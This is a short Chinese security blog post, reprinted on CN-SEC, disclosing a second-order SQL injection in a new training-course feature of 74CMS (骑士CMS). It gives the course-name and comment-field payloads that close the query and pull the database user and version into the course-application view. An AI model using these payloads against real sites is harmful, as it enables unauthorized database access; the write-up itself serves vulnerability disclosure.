骑士CMS某新功能SQL注入

没穿底裤 2020年1月1日05:26:41评论365 views字数 197阅读0分39秒阅读模式
摘要

培训中心SQL注入。所以先注册一个培训中心的账号,然后去发不新课程,课程名用:cname'/*, 其他的随便填写。

培训中心SQL注入。所以先注册一个培训中心的账号,然后去发不新课程,

课程名用:cname'/*, 其他的随便填写。

骑士CMS某新功能SQL注入

然后使用用户的身份登录其申请课程:

骑士CMS某新功能SQL注入

随便填写:

骑士CMS某新功能SQL注入

提交即返回错误:

骑士CMS某新功能SQL注入

我们把其他说明改为:

code 区域
*/,3,1, 200, concat(user(),0x0a,version()) , 1, 1413525884)#

然后提交即成功。

这个时候用培训中心的账号,查看课程申请:

骑士CMS某新功能SQL注入

可以看到数据已经出来了。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日05:26:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   骑士CMS某新功能SQL注入http://cn-sec.com/archives/75935.html

发表评论

匿名网友 填写信息